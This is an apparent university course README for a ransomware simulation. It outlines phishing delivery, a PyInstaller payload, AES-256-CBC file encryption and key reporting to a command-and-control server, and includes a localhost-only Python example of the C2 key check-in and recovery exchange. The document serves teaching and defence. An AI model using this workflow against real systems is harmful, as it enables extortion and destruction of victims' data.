This project is a Crypto Ransomware Simulation developed for the course:
CST-7413 – Ethical Hacking and Penetration Testing
Faculty of Computer System and Technologies
University of Information Technology
Academic Year: 2025–2026
The project demonstrates a complete ransomware attack lifecycle in a controlled laboratory environment, including phishing delivery, payload execution, file encryption, command-and-control communication, and recovery.
This project was created strictly for educational and cybersecurity research purposes.
All experiments were conducted in an isolated lab environment.
The objectives of this simulation include:
- Demonstrating how ransomware attacks are delivered through phishing campaigns
- Understanding encryption techniques used by ransomware
- Studying command-and-control communication
- Practicing incident response and recovery
- Improving cybersecurity awareness and defensive strategies
The ransomware simulation replicates a typical ransomware attack workflow:
- Phishing Email Campaign
- Malicious Website Hosting
- Payload Delivery
- File Encryption
- Command & Control Communication
- Recovery Process
This allows cybersecurity students to observe how ransomware attacks operate and how defenders can respond.
- Kali Linux
- Windows 10 / Windows 11
- Python 3
- PyCryptodome
- Kali Linux penetration testing tools
- PyInstaller
- Apache Web Server
- Netlify (website hosting)
- Gmail SMTP (email delivery)
Attacker Machine (Kali Linux)
├── Phishing Email Script
├── Malicious Website
├── Ransomware Builder
└── Command & Control Server
        │
        ▼
Victim Machine (Windows)
├── Downloads payload
├── Executes ransomware
└── Files encrypted
        │
        ▼
Encryption key sent to attacker server
        │
        ▼
Recovery tool provided to decrypt files
The ransomware simulation uses:
- AES-256 encryption (a 32-byte key)
- CBC encryption mode
- Random key generation
- Cryptographically random initialization vectors (IVs); CBC must never reuse an IV under the same key
Symmetric file encryption with AES-CBC reflects a core technique of modern ransomware families. Two limitations of this simplified model are worth keeping in mind when studying it: CBC gives confidentiality but no integrity, so a tampered ciphertext is only noticed if its padding happens to break; and here the symmetric key is transmitted to the attacker server as-is, whereas real families typically wrap a per-victim key with an attacker-controlled public key so that it never has to leave the victim host in recoverable form.
The simulation was tested using the following steps:
- Deploy the malicious website
- Send the phishing email (via Gmail SMTP) to the victim
- Victim follows the link and downloads the PyInstaller-built executable payload
- Ransomware runs and encrypts the victim's files with AES-256-CBC
- Encryption key transmitted to the attacker's command-and-control server
- Recovery tool provided to the victim to decrypt the files with the stored key
The experiment demonstrates the full attack chain from initial compromise to recovery.
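As an added example, not the project's own code, the following shows the key-transmission and recovery exchange from the last two steps above with both sides in one process: a stand-in command-and-control server and the victim-side client. The wire format is an assumption not taken from the README (JSON over plain HTTP, a POST to /checkin carrying the victim ID and the key as hex, and a GET to /key/<victim_id> used by the recovery tool); the key bytes are constructed with os.urandom rather than produced by the encryption routine, and the server binds to an ephemeral localhost port so the example runs offline.

```python
"""Added example (not the project's code): simulated C2 key check-in and
recovery lookup. Assumed protocol: JSON over HTTP, POST /checkin, GET /key/<id>."""
import json
import os
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class C2Handler(BaseHTTPRequestHandler):
    """Attacker side: stores one key per victim and hands it back on request."""
    keys = {}        # victim_id -> key as hex
    wire_log = []    # raw request bodies exactly as they crossed the wire

    def do_POST(self):
        if self.path != "/checkin":
            self.send_error(404)
            return
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        self.wire_log.append(body)
        record = json.loads(body)
        self.keys[record["victim_id"]] = record["key"]
        self._reply(200, {"status": "stored"})

    def do_GET(self):
        prefix = "/key/"
        victim_id = self.path[len(prefix):]
        if not self.path.startswith(prefix) or victim_id not in self.keys:
            self.send_error(404)
            return
        self._reply(200, {"key": self.keys[victim_id]})

    def _reply(self, code, obj):
        data = json.dumps(obj).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_c2():
    """Bind to an ephemeral localhost port and serve in a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), C2Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


def send_key(base_url, victim_id, key):
    """Victim side: the payload reports its key right after encrypting files."""
    body = json.dumps({"victim_id": victim_id, "key": key.hex()}).encode()
    req = urllib.request.Request(base_url + "/checkin", data=body, method="POST",
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())["status"]


def fetch_key(base_url, victim_id):
    """Recovery side: the decryptor retrieves the key stored for this victim."""
    with urllib.request.urlopen(base_url + "/key/" + victim_id) as resp:
        return bytes.fromhex(json.loads(resp.read())["key"])


def run_exchange():
    """Full exchange with a constructed key; returns facts a test can check."""
    server, base_url = start_c2()
    try:
        key = os.urandom(32)                          # constructed 256-bit key
        status = send_key(base_url, "LAB-WIN10-01", key)
        recovered = fetch_key(base_url, "LAB-WIN10-01")
        # The key crossed the wire as plain hex: a network sensor on the lab
        # segment can pull it straight out of the request body.
        key_in_clear = key.hex().encode() in C2Handler.wire_log[-1]
        unknown_404 = False
        try:
            fetch_key(base_url, "NOBODY")             # unregistered victim
        except urllib.error.HTTPError as err:
            unknown_404 = err.code == 404
    finally:
        server.shutdown()
        server.server_close()
    return {"status": status, "key_matches": recovered == key,
            "key_in_clear": key_in_clear, "unknown_404": unknown_404}


if __name__ == "__main__":
    print(run_exchange())
```

The `wire_log` check is the defensive takeaway: because the key travels unencrypted, the same request that lets the attacker decrypt also gives a network monitor the material to recover files without paying, which is one reason real families avoid sending a bare symmetric key.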
This project was created for educational purposes only.
The techniques demonstrated in this repository are intended to help students and security professionals:
- Understand ransomware behavior
- Improve detection and prevention methods
- Train in cybersecurity incident response
❗ Do not use this code for malicious activities.
The author is not responsible for any misuse of this project.
Possible future enhancements include:
- Polymorphic ransomware simulation
- Lateral movement simulation
- Machine learning–based ransomware detection
- Network anomaly monitoring
- Security awareness training modules
Thaw Htet Swann — 4CSEC-1601
Kyaw Min Wai — 4CSEC-1919
Faculty of Computer System and Technologies
University of Information Technology
- MITRE ATT&CK Framework: https://attack.mitre.org
- NIST Cybersecurity Framework: https://www.nist.gov/cyberframework
- CISA Ransomware Guide: https://www.cisa.gov/stopransomware
- PyCryptodome Documentation: https://pycryptodome.readthedocs.io
- Kali Linux Documentation: https://www.kali.org/docs/
All experiments described in this project were conducted in a controlled laboratory environment with proper authorization.
This project aims to improve cybersecurity education and ransomware defense research.